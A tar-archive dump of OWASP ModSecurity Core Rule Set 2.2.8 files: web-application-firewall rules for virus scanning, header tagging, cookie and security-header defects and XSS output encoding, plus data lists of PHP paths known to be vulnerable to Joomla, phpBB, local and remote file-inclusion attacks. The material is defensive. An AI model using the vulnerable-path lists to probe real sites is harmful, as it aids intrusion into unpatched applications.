������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/optional_rules/modsecurity_crs_46_av_scanning.conf���������0000664�0000000�0000000�00000001453�12164572564�0032532�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # Modify the operator to use the correct AV scanning script/tool # Example tools are in the util directory. # SecRule FILES_TMPNAMES "@inspectFile /bin/runAV" \ "phase:2,t:none,block,msg:'Virus found in uploaded file',id:'950115',tag:'MALICIOUS_SOFTWARE/VIRUS',tag:'PCI/5.1',severity:'2',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-MALICIOUS_SOFTWARE/VIRUS-%{matched_var_name}=%{tx.0}" ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/optional_rules/modsecurity_crs_47_skip_outbound_checks.conf0000664�0000000�0000000�00000001527�12164572564�0034454�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # This ruleset is a complementary to ruleset 34 - Ignore Static. By default, # ruleset 34 doesn't skip inspection for leakages in html/documents. # Adding this ruleset to your configuration will cause ModSecurity to also # skip the rules in files # # Skip outbound inspection on requests for text content which have no parameters SecRule TX:text_file_extension "@eq 1" "chain,phase:3,allow,nolog,id:'999008',severity:'6'" SecRule TX:no_parameters "@eq 1" �������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/optional_rules/modsecurity_crs_49_header_tagging.conf������0000664�0000000�0000000�00000006220�12164572564�0033174�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # This file will add Request Header Tagging which allows ModSecurity to communicate # any event/rule matches it finds with the downstream application server. The concept # is similar to that of Anti-SPAM apps for Email (such as SpamAssassin). # # The idea is that if the WAF is in a DetectionOnly mode, it can still share data # with the destination app server and then the app server may choose to inspect # the new WAF request headers and factor in this data into a possible blocking # decision. # # This concept is tremendously useful in a distributed architecture and/or when # there are Fraud Detection Systems at the app server layer that can correlate # the WAF data into the overall Fraud Score. This is also useful in Hosting # Environments where the decision to block may not be as clear. # SecRule TX:ANOMALY_SCORE "@eq 0" "phase:2,id:'900044',t:none,nolog,pass,skipAfter:END_HEADER_TAGGING" SecRule TX:/^\d/ "." "phase:2,id:'900045',t:none,nolog,pass,setvar:tx.counter=+1,setenv:matched_rule-%{tx.counter}=%{matched_var_name},setenv:anomaly_score=%{tx.anomaly_score},setenv:sql_injection_score=%{tx.sql_injection_score},setenv:xss_score=%{tx.xss_score}" RequestHeader append X-WAF-Events "%{matched_rule-1}e" env=matched_rule-1 RequestHeader append X-WAF-Events "%{matched_rule-2}e" env=matched_rule-2 RequestHeader append X-WAF-Events "%{matched_rule-3}e" env=matched_rule-3 RequestHeader append X-WAF-Events "%{matched_rule-4}e" env=matched_rule-4 RequestHeader append X-WAF-Events "%{matched_rule-5}e" env=matched_rule-5 RequestHeader append X-WAF-Events "%{matched_rule-6}e" env=matched_rule-6 RequestHeader append X-WAF-Events "%{matched_rule-7}e" env=matched_rule-7 RequestHeader append X-WAF-Events "%{matched_rule-8}e" env=matched_rule-8 RequestHeader append X-WAF-Events "%{matched_rule-9}e" env=matched_rule-9 RequestHeader append X-WAF-Events "%{matched_rule-10}e" env=matched_rule-10 RequestHeader append X-WAF-Events "%{matched_rule-11}e" env=matched_rule-11 RequestHeader append X-WAF-Events "%{matched_rule-12}e" env=matched_rule-12 RequestHeader append X-WAF-Events "%{matched_rule-13}e" env=matched_rule-13 RequestHeader append X-WAF-Events "%{matched_rule-14}e" env=matched_rule-14 RequestHeader append X-WAF-Events "%{matched_rule-15}e" env=matched_rule-15 RequestHeader append X-WAF-Events "%{matched_rule-16}e" env=matched_rule-16 RequestHeader append X-WAF-Events "%{matched_rule-17}e" env=matched_rule-17 RequestHeader append X-WAF-Events "%{matched_rule-18}e" env=matched_rule-18 RequestHeader append X-WAF-Events "%{matched_rule-19}e" env=matched_rule-19 RequestHeader append X-WAF-Events "%{matched_rule-20}e" env=matched_rule-20 RequestHeader set X-WAF-Score "Total=%{anomaly_score}e; sqli=%{sql_injection_score}e; xss=%{xss_score}e" env=anomaly_score SecMarker END_HEADER_TAGGING ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/optional_rules/modsecurity_crs_55_application_defects.conf�0000664�0000000�0000000�00000033363�12164572564�0034251�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- ############################################################################## # -=[ Charset Checks ]=- # # http://websecuritytool.codeplex.com/wikipage?title=Checks#charset ############################################################################## # # [ Charset not set ] # # - http://code.google.com/p/browsersec/wiki/Part2#Content_handling_mechanisms # SecRule &GLOBAL:MISSING_CHARSET "@eq 0" "phase:5,t:none,nolog,pass,id:'981219',setvar:global.missing_charset=0" SecRule GLOBAL:MISSING_CHARSET "@le 10" "chain,phase:5,t:none,pass,id:'981220',log,msg:'[Watcher Check] No charset was specified in the HTTP Content-Type header nor the HTML content\'s meta tag.',logdata:'Content-Type Response Header: %{response_content_type}',tag:'WASCTC/WASC-15',tag:'APP_DEFECT/MISCONFIGURATION',tag:'http://code.google.com/p/browsersec/wiki/Part2#Content_handling_mechanisms'" SecRule RESPONSE_STATUS "@rx ^2" "chain" SecRule RESPONSE_HEADERS:Content-Length "!@streq 0" "chain" SecRule RESPONSE_CONTENT_TYPE "(?i:^(text/html|text/xml|application/xml);?$)" "chain" SecRule RESPONSE_BODY "!@rx (?i:(<meta.*?(content|value)=\"text/html;\s?charset=|<\?xml.*?encoding=))" "setvar:global.missing_charset=+1,expirevar:global.missing_charset=86400" # # [ Charset not explicitly set to UTF-8 in HTML/XML content ] # # - http://websecuritytool.codeplex.com/wikipage?title=Checks#charset-not-utf8 # - http://code.google.com/p/browsersec/wiki/Part2#Character_set_handling_and_detection # SecRule &GLOBAL:CHARSET_NOT_UTF8 "@eq 0" "phase:5,t:none,nolog,pass,id:'981221',setvar:global.charset_not_utf8=0" SecRule GLOBAL:CHARSET_NOT_UTF8 "@le 10" "chain,phase:5,t:none,pass,id:'981222',log,msg:'[Watcher Check] The charset specified was not utf-8 in the HTTP Content-Type header nor the HTML content\'s meta tag.',logdata:'Content-Type Response Header: %{response_content_type}',tag:'WASCTC/WASC-15',tag:'MISCONFIGURATION',tag:'http://websecuritytool.codeplex.com/wikipage?title=Checks#charset-not-utf8'" SecRule RESPONSE_STATUS "@rx ^2" "chain" SecRule RESPONSE_CONTENT_TYPE "(?i:(^text/html|^application/xml|^text/xml))" "chain" SecRule RESPONSE_CONTENT_TYPE "!@contains charset=utf-8" "chain,t:none,t:lowercase" SecRule RESPONSE_HEADERS:Content-Length "!@streq 0" "chain" SecRule RESPONSE_BODY "!@rx (<meta.*?(content|value)=\"text/html;\s?charset=utf-8|<\?xml.*?encoding=\"utf-8\")" "t:none,t:lowercase,setvar:global.charset_not_utf8=+1,expirevar:global.charset_not_utf8=86400" # # [ Detect charset mismatches between HTTP header and HTML/XML bodies ] # # - http://websecuritytool.codeplex.com/wikipage?title=Checks#charset-mismatch # - http://code.google.com/p/browsersec/wiki/Part2#Character_set_handling_and_detection # SecRule &GLOBAL:CHARSET_MISMATCH "@eq 0" "phase:5,t:none,nolog,pass,id:'981223',setvar:global.charset_mismatch=0" SecRule GLOBAL:CHARSET_MISMATCH "@le 10" "chain,phase:5,t:none,pass,id:'981224',log,msg:'[Watcher Check] The charset specified was not the same in the HTTP Content-Type header and in the HTML content\'s meta tag',logdata:'Content-Type Response Header Charset is: %{tx.charset_header} and HTTP Equiv Charset is: %{tx.charset_body}',tag:'WASCTC/WASC-15',tag:'MISCONFIGURATION',tag:'http://websecuritytool.codeplex.com/wikipage?title=Checks#charset-mismatch'" SecRule RESPONSE_STATUS "@rx ^2" "chain" SecRule RESPONSE_CONTENT_TYPE "(?i:^(text/html|text/xml|application/xml);\s?charset=([^;]*))" "chain,t:none,t:lowercase,capture,setvar:tx.charset_header=%{tx.2}" SecRule RESPONSE_HEADERS:Content-Length "!@streq 0" "chain" SecRule RESPONSE_BODY "(?i)(charset|encoding)=\"?(.*?)\"" "chain,t:none,t:lowercase,capture,setvar:tx.charset_body=%{tx.2}" SecRule TX:CHARSET_HEADER "!@streq %{tx.charset_body}" "t:none,setvar:global.charset_mismatch=+1,expirevar:global.charset_mismatch=86400" ############################################################################## # -=[ Cookie Checks ]=- # # - http://websecuritytool.codeplex.com/wikipage?title=Checks#cookies ############################################################################## # # [ Look for cookies with loosely scoped domain restrictions ] # # - http://websecuritytool.codeplex.com/wikipage?title=Checks#cookie-loosely-scoped-domain # - http://code.google.com/p/browsersec/wiki/Part2#Same-origin_policy_for_cookies # SecRule &GLOBAL:LOOSE_DOMAIN_SCOPE "@eq 0" "phase:5,t:none,nolog,pass,id:'981237',setvar:global.loose_domain_scope=0" SecRule GLOBAL:LOOSE_DOMAIN_SCOPE "@le 10" "chain,phase:5,id:'981238',t:none,pass,log,auditlog,msg:'AppDefect: Loose Domain Cookie Flag Restrictions.',logdata:'Cookie: %{tx.1} and Domain: %{tx.2}.',tag:'WASCTC/WASC-15',tag:'MISCONFIGURATION',tag:'http://websecuritytool.codeplex.com/wikipage?title=Checks#cookie-loosely-scoped-domain'" SecRule RESPONSE_HEADERS:/Set-Cookie2?/ "!@rx (?i)domain=(?:(?!\d|-)[a-zA-Z0-9\-]{1,63}(?<!-)\.)([a-zA-Z0-9\-]{1,63}(?<!-)\.)(?:[a-zA-Z]{2,})" "chain,setvar:tx.set-cookie-counter=+1,setvar:tx.%{matched_var_name}_%{tx.set-cookie-counter}=%{matched_var}" SecRule TX:/^RESPONSE_HEADERS:Set-Cookie2?_/ "(?i)^(.*?);.*domain=(.*?);" "capture,setvar:global.loose_domain_scope=+1,expirevar:global.loose_domain_scope=86400" # # [ Cookie's HttpOnly Flag Was Not Set ] # # - http://websecuritytool.codeplex.com/wikipage?title=Checks#cookie-not-setting-httponly-flag # - https://www.owasp.org/index.php/HttpOnly # SecRule &GLOBAL:MISSING_HTTPONLY "@eq 0" "phase:5,t:none,nolog,pass,id:'981235',setvar:global.missing_httponly=0" SecRule GLOBAL:MISSING_HTTPONLY "@le 10" "chain,phase:5,id:'981184',t:none,pass,log,auditlog,msg:'AppDefect: Missing HttpOnly Cookie Flag for %{tx.1}.',tag:'WASCTC/WASC-15',tag:'MISCONFIGURATION',tag:'http://websecuritytool.codeplex.com/wikipage?title=Checks#cookie-not-setting-httponly-flag'" SecRule RESPONSE_HEADERS:/Set-Cookie2?/ "(.*?)=(?i)(?!.*httponly.*)(.*$)" "capture,setvar:global.missing_httponly=+1,expirevar:global.missing_httponly=86400" # # [ Fix Missing "httponly" Flag ] # Header edit Set-Cookie "^((?i:(_?(COOKIE|TOKEN)|atlassian.xsrf.token|[aj]?sessionid|(php)?sessid|(asp|jserv|jw)?session[-_]?(id)?|cf(id|token)|sid))=(?i:(?!httponly).)+)$" "$1; HttpOnly" # # [ Cookie's Secure Flag Was Not Set ] # # - http://websecuritytool.codeplex.com/wikipage?title=Checks#cookie-not-setting-secure-flag # - https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet#Rule_-_Use_.22Secure.22_Cookie_Flag # SecRule &GLOBAL:MISSING_SECURE "@eq 0" "phase:3,t:none,nolog,pass,id:'981236',setvar:global.missing_secure=0" SecRule GLOBAL:MISSING_SECURE "@le 10" "chain,phase:3,id:'981185',t:none,pass,log,auditlog,msg:'AppDefect: Missing Secure Cookie Flag for %{tx.1}.',tag:'WASCTC/WASC-15',tag:'MISCONFIGURATION',tag:'http://websecuritytool.codeplex.com/wikipage?title=Checks#cookie-not-setting-secure-flag'" SecRule SERVER_PORT "@streq 443" "chain,t:none,setenv:secure_site" SecRule RESPONSE_HEADERS:/Set-Cookie2?/ "(.*?)=(?i)(?!.*secure.*)(.*$)" "capture,setvar:global.missing_secure=+1,expirevar:global.missing_secure=86400" # # [ Fix Missing "secure" Flag ] # Header edit Set-Cookie "^((?i:(_?(COOKIE|TOKEN)|atlassian.xsrf.token|[aj]?sessionid|(php)?sessid|(asp|jserv|jw)?session[-_]?(id)?|cf(id|token)|sid))=(?i:(?!secure).)+)$" "$1; secure" env=secure_site ############################################################################## # -=[ HTTP Header Checks ]=- # # - http://websecuritytool.codeplex.com/wikipage?title=Checks#header ############################################################################## # # [ Check that the cache-control HTTP header is set to 'no-store' ] # # - http://websecuritytool.codeplex.com/wikipage?title=Checks#http-cache-control-header-no-store # SecRule &GLOBAL:CHECK_CACHE_CONTROL "@eq 0" "phase:5,t:none,nolog,pass,id:'981239',setvar:global.check_cache_control=0" SecRule GLOBAL:CHECK_CACHE_CONTROL "@le 10" "chain,phase:5,id:'900046',t:none,pass,log,auditlog,msg:'AppDefect: Cache-Control Response Header Missing \'no-store\' flag.',logdata:'Cache-Control: %{response_headers.cache-control}',tag:'WASCTC/WASC-15',tag:'MISCONFIGURATION',tag:'http://websecuritytool.codeplex.com/wikipage?title=Checks#http-cache-control-header-no-store'" SecRule RESPONSE_HEADERS:Cache-Control "!@contains no-store" "t:none,t:lowercase,setvar:global.check_cache_control=+1,expirevar:global.check_cache_control=86400" # # [ Check that a Content-Type header is included in the HTTP response ] # # - http://websecuritytool.codeplex.com/wikipage?title=Checks#http-content-type-header-missing # SecRule &GLOBAL:CONTENT_TYPE_HEADER_EXISTS "@eq 0" "phase:5,t:none,nolog,pass,id:'981400',setvar:global.content_type_header_exists=0" SecRule GLOBAL:CONTENT_TYPE_HEADER_EXISTS "@le 10" "chain,phase:5,id:'981401',t:none,pass,log,auditlog,msg:'AppDefect: Content-Type Response Header is Missing or Empty.',logdata:'Content-Type: %{response_headers.content-type}',tag:'WASCTC/WASC-15',tag:'MISCONFIGURATION',tag:'http://websecuritytool.codeplex.com/wikipage?title=Checks#http-content-type-header-missing'" SecRule &RESPONSE_HEADERS:Content-Type|RESPONSE_HEADERS:Content-Type "^0$|^$" "t:none,setvar:global.content_type_header_exists=+1,expirevar:global.content_type_header_exists=86400" # # [ Check that IE's XSS protection filter is not being disabled by the Web-application ] # # - http://websecuritytool.codeplex.com/wikipage?title=Checks#internet-explorer-xss-filter-disabled # SecRule &GLOBAL:X_XSS_PROTECTION_DISABLED "@eq 0" "phase:5,t:none,nolog,pass,id:'981402',setvar:global.x_xss_protection_disabled=0" SecRule GLOBAL:X_XSS_PROTECTION_DISABLED "@le 10" "chain,phase:5,id:'981403',t:none,pass,log,auditlog,msg:'AppDefect: IE8\'s XSS protection Filter is Disabled.',logdata:'X-XSS-Protection: %{response_headers.x-xss-protection}',tag:'WASCTC/WASC-15',tag:'MISCONFIGURATION',tag:'http://websecuritytool.codeplex.com/wikipage?title=Checks#internet-explorer-xss-filter-disabled'" SecRule RESPONSE_HEADERS:X-XSS-Protection "@streq 0" "t:none,setvar:global.x_xss_protection_disabled=+1,expirevar:global.x_xss_protection_disabled=86400" # # [ Check that the X-FRAME-OPTIONS header is being set for Clickjacking defense ] # # - http://websecuritytool.codeplex.com/wikipage?title=Checks#http-header-x-frame-options # SecRule &GLOBAL:X_FRAME_OPTIONS "@eq 0" "phase:5,t:none,nolog,pass,id:'981404',setvar:global.x_frame_options=0" SecRule GLOBAL:X_FRAME_OPTIONS "@le 10" "chain,phase:5,id:'981405',t:none,pass,log,auditlog,msg:'AppDefect: X-FRAME-OPTIONS Response Header is Missing or not set to Deny.',logdata:'X-FRAME-OPTIONS: %{response_headers.x-frame-options}',tag:'WASCTC/WASC-15',tag:'MISCONFIGURATION',tag:'http://websecuritytool.codeplex.com/wikipage?title=Checks#http-header-x-frame-options'" SecRule &RESPONSE_HEADERS:X-FRAME-OPTIONS|RESPONSE_HEADERS:X-FRAME-OPTIONS "^(?i:0|allow)$" "t:none,setvar:global.x_frame_options=+1,expirevar:global.x_frame_options=86400" # # [ Checks that the X-CONTENT-TYPE-OPTIONS defense against MIME-sniffing has been declared ] # # - http://websecuritytool.codeplex.com/wikipage?title=Checks#http-header-x-content-type-options # SecRule &GLOBAL:X_CONTENT_TYPE_OPTIONS "@eq 0" "phase:5,t:none,nolog,pass,id:'981406',setvar:global.x_content_type_options=0" SecRule &RESPONSE_HEADERS:Content-Type|RESPONSE_HEADERS:Content-Type "^0$|^$" "chain,phase:5,id:'981407',t:none,pass,log,auditlog,msg:'AppDefect: Content-Type Response Header is Missing and X-Content-Type-Options is either missing or not set to \'nosniff\'.',logdata:'X-Content-Type-Options: %{response_headers.x-content-type-options}',tag:'WASCTC/WASC-15',tag:'MISCONFIGURATION',tag:'http://websecuritytool.codeplex.com/wikipage?title=Checks#http-header-x-content-type-options'" SecRule GLOBAL:X_CONTENT_TYPE_OPTIONS "@le 10" "chain" SecRule &RESPONSE_HEADERS:X-Content-Type-Options|RESPONSE_HEADERS:X-Content-Type-Options "^0$|^[a-z]+(?<!:nosniff)" "t:none,t:lowercase,setvar:global.x_content_type_options=+1,expirevar:global.x_content_type_options=86400" # XSS Detection - Missing Output Encoding # SecAction "phase:1,id:'900047',nolog,pass,initcol:global=xss_list" # # Identifies Reflected XSS # If malicious input (with Meta-Characters) is echoed back in the reply non-encoded. # SecRule &ARGS "@gt 0" "chain,phase:4,id:'900048',t:none,log,auditlog,deny,status:403,msg:'Potentially Malicious Meta-Characters in User Data Not Properly Output Encoded.',logdata:'%{tx.inbound_meta-characters}'" SecRule ARGS "([\'\"\(\)\;<>#])" "chain,t:none" SecRule MATCHED_VAR "^.{15,}$" "chain,t:none,setvar:tx.inbound_meta-characters=%{matched_var}" SecRule RESPONSE_BODY "@contains %{tx.inbound_meta-characters}" "ctl:auditLogParts=+E" # # Check to see if TX XSS Data is already in the GLOBAL list. If it is - expire it. SecRule GLOBAL:'/XSS_LIST_.*/' "@streq %{tx.inbound_meta-characters}" "phase:4,id:'981180',t:none,nolog,pass,skip:1" SecRule TX:INBOUND_META-CHARACTERS ".*" "phase:4,id:'981181',t:none,nolog,pass,setvar:global.xss_list_%{time_epoch}=%{matched_var}" # # Identifies Stored XSS # If malicious input (with Meta-Characters) is echoed back on any page non-encoded. SecRule GLOBAL:'/XSS_LIST_.*/' "@within %{response_body}" "phase:4,id:'981182',t:none,log,auditlog,pass,msg:'Potentially Malicious Meta-Characters in User Data Not Properly Output Encoded',tag:'WEB_ATTACK/XSS'" �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/optional_rules/modsecurity_crs_55_marketing.conf�����������0000664�0000000�0000000�00000002256�12164572564�0032227�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # These rules do not have a security importance, but shows other benefits of # monitoring and logging HTTP transactions. # -- SecRule REQUEST_HEADERS:User-Agent "msn(?:bot|ptc)" \ "phase:2,rev:'2.2.8',t:none,t:lowercase,block,msg:'MSN robot activity',id:'910008',severity:'6'" SecRule REQUEST_HEADERS:User-Agent "\byahoo(?:-(?:mmcrawler|blogs)|! slurp)\b" \ "phase:2,rev:'2.2.8',t:none,t:lowercase,block,msg:'Yahoo robot activity',id:'910007',severity:'6'" SecRule REQUEST_HEADERS:User-Agent "(?:(?:gsa-crawler \(enterprise; s4-e9lj2b82fjjaa; me\@mycompany\.com|adsbot-google \(\+http:\/\/www\.google\.com\/adsbot\.html)\)|\b(?:google(?:-sitemaps|bot)|mediapartners-google)\b)" \ "phase:2,rev:'2.2.8',t:none,t:lowercase,block,msg:'Google robot activity',id:'910006',severity:'6'" ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/slr_rules/�������������������������������������������������0000775�0000000�0000000�00000000000�12164572564�0022536�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/slr_rules/modsecurity_46_slr_et_joomla.data����������������0000664�0000000�0000000�00000003303�12164572564�0031161�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/acomponents/com_mamboleto/mamboleto.php /admin.rssreader.php /administrator/components/com_joomlaxplorer/admin.joomlaxplorer.php /administrator/components/com_jwmmxtd/admin.jwmmxtd.php /administrator/components/com_sqlreport/ajax/print.php /administrator/components/com_universal/includes/config/config.html.php /administrator/components/com_xcloner-backupandrestore/cloner.cron.php /administrator/components/com_xcloner-backupandrestore/index2.php /com_koesubmit/koesubmit.php /com_ongumatimesheet20/lib/onguma.class.php /com_rwcards/rwcards.advancedate.php /com_swmenupro/ImageManager/Classes/ImageManager.php /com_xmovie/helpers/img.php /components/com_ajaxchat/tests/ajcuser.php /components/com_banners/banners.class.php /components/com_ezine/class/php/d4m_ajax_pagenav.php /components/com_intuit/models/intuit.php /components/com_jcalpro/cal_popup.php /components/com_mediaslide/viewer.php /components/com_mgm/help.mgm.php /components/com_mojo/wp-comments-post.php /components/com_mojo/wp-trackback.php /components/com_moofaq/includes/file_includer.php /components/com_morfeoshow/morfeoshow.html.php /components/com_smartformer/smartformer.php /components/com_xgallery/helpers/img.php /config.dadamail.php /database/table/user.php /example.php /gmail.php /index.php /letterman.class.php /models/category.php /modules/mod_mainmenu/menu.php /modules/mod_virtuemart_featureprod/mod_virtuemart_featureprod.php /modules/mod_virtuemart_latestprod/mod_virtuemart_latestprod.php /plugins/authentication/ldap.php /plugins/search/categories.php /plugins/search/contacts.php /plugins/search/content.php /plugins/search/sections.php /plugins/search/weblinks.php /plugins/user/example.php /real_estate/index.php admin.ponygallery.html.php�����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/slr_rules/modsecurity_46_slr_et_lfi.data�������������������0000664�0000000�0000000�00000010221�12164572564�0030447�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/123flashchat.php /ADM_Pagina.php /ST_browsers.php /ST_countries.php /ST_platforms.php /_conf/core/common-tpl-vars.php /_footer.php /_functions.php /acopia/manager/DiagCaptureFileListActionBody.do /acopia/manager/DiagLogListActionBody.do /acopia/sat/ViewInventoryErrorReport.do /acopia/sat/ViewSatReport.do /active_auctions.php /addedit-render.php /admin/admin_groups_reapir.php /admin/admin_smilies.php /admin/admin_words.php /admin/loadplugin.php /admin/thumbnailformpost.inc.php /admin/upgrade_unattended.php /administrator/components/com_xcloner-backupandrestore/cloner.cron.php /api/download_launch.php /arch.php /artmedic_print.php /authenticate/sessions.php /baconmap/admin/updatelist.php /bin/qte_init.php /block_center_down.php /block_center_top.php /block_left.php /block_right.php /body_default.php /books/getConfig.php /centre.php /chat/dac.php /classes/BxDolGzip.php /classes/flash_mp3_player.23/extras/external_feeds/getfeed.php /classes/flash_mp3_player/extras/external_feeds/getfeed.php /cms_detect.php /com_xmovie/helpers/img.php /components/com_intuit/models/intuit.php /components/com_mediaslide/viewer.php /components/com_moofaq/includes/file_includer.php /components/com_xgallery/helpers/img.php /config.dadamail.php /config.php /container.php /content/dynpage_load.php /cron.php /cuenta/cuerpo.php /cultbooking.php /debugger/debug_php.php /detail.php /devtools/qooxdoo-sdk/framework/source/resource/qx/test/part/delay.php /dm-albums/template/album.php /doku.php /download.php /examples/tbs_us_examples_0view.php /export.php /footer.inc.php /forum.php /gradebook/open_document.php /header.inc.php /header.php /include/global.php /include/timesheet.php /include/unverified.inc.php /includes/esqueletos/skel_null.php /includes/function_core.php /includes/header.php /includes/initsystem.php /includes/startmodules.inc.php /index.php /index_inc.php /infusions/last_seen_users_panel/last_seen_users_panel.php /init.php /latestposts.php /lib/function.php /lib/lcUser.php /library/setup/rpc.php /locales.php /locms/smarty.php /login.tpl.php /main.inc.php /maincore.php /message_class.php /mini.php /mods/ckeditor/filemanager/connectors/php/connector.php /module.php /modules/3rdparty/adminpart/add3rdparty.php /modules/articles/adminpart/addarticles.php /modules/brandnews/adminpart/addbrandnews.php /modules/comments.php /modules/contact/adminpart/addcontact.php /modules/core/security/init.php /modules/game/adminpart/addgame.php /modules/login.php /modules/maticmarket/bleu/blanc/bas.php /modules/maticmarket/bleu/blanc/haut.php /modules/maticmarket/bleu/default/bas.php /modules/maticmarket/bleu/default/haut.php /modules/maticmarket/bleu/gold/bas.php /modules/maticmarket/bleu/gold/haut.php /modules/maticmarket/deco/blanc/bas.php /modules/maticmarket/deco/blanc/haut.php /modules/newsletter/adminpart/addnewsletter.php /modules/plain/adminpart/addplain.php /modules/polling/adminpart/addpolling.php /modules/product/adminpart/addproduct.php /modules/profile/user.php /modules/tour/adminpart/addtour.php /news/search.php3 /news_show.php /oldnews_reader.php /op/op.Login.php /passwiki.php /pcltar.lib.php /plog-includes/lib/phpthumb/phpThumb.php /plugin/gateway/gnokii/init.php /plugin/themes/default/init.php /plugins/PluginController.php /plugins/filemanager/get_file.php /plugins/templateie/lib/templateie_install.class.php /pmscript.php /portfolio/css.php /preview.php /qlib/smarty.inc.php /qte_web.php /resource_categories_view.php /scr/soustab.php /section.php /server_request.php /show_joined.php /sitemap.xml.php /snippet.reflect.php /spaw_control.class.php /stage1.php /stage4.php /stage6.php /telecharger.php /templater.php /templates/layout_lyrics.php /threadstop/threadstop.php /tiki-jsplugin.php /update_trailer.php /urheber.php /util/barcode.php /vars.inc.php /viewsource.php /website.php /windetail.php /window_down.php /window_top.php /wp-content/plugins/jquery-mega-menu/skin.php /wp-content/plugins/php_speedy_wp/libs/php_speedy/view/admin_container.php /wp-content/plugins/ungallery/source_vuln.php /wp-content/plugins/wp-publication-archive/includes/openfile.php /wp-content/plugins/xcloner-backup-and-restore/cloner.cron.php app=urchin.cgi functions_navlinks.php profile_send.php viewtopic_PM-link.php�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/slr_rules/modsecurity_46_slr_et_phpbb.data�����������������0000664�0000000�0000000�00000000311�12164572564�0030767�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������.php /acp_lcxbbportal.php /admin/admin_acronyms.php /admin/admin_groups_reapir.php /admin/admin_smilies.php /admin/admin_words.php /admin_hacks_list.php /include/global.php /index.php /portal_block.php�����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/slr_rules/modsecurity_46_slr_et_rfi.data�������������������0000664�0000000�0000000�00000030356�12164572564�0030470�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������.php /123flashchat.php /2checkout_return.inc.php /ADM_Pagina.php /Admin/ResellersManager.class.php /Base/example_1.php /Clickheat/Cache.php /Clickheat_Heatmap.php /CoupleDB.php /Customers/PDPEmailReplaceConstants.class.php /DB_adodb.class.php /Framework/EmailTemplates.class.php /GlobalVariables.php /HTMLSax3.php /LSTable.php /OpenSiteAdmin/pages/pageHeader.php /ST_browsers.php /ST_countries.php /ST_platforms.php /SezHooTabsAndActions.php /Thumbnail.php /_conf/core/common-tpl-vars.php /_footer.php /_functions.php /acomponents/com_mamboleto/mamboleto.php /acopia/manager/DiagCaptureFileListActionBody.do /acopia/manager/DiagLogListActionBody.do /acopia/sat/ViewInventoryErrorReport.do /acopia/sat/ViewSatReport.do /acp_lcxbbportal.php /action.php /active_auctions.php /activities/workflow-activities.php /add_comments.php /addedit-render.php /adm/krgourl.php /admin.googlebase.php /admin.rssreader.php /admin/admin_groups_reapir.php /admin/admin_news_bot.php /admin/admin_smilies.php /admin/admin_words.php /admin/frontpage_right.php 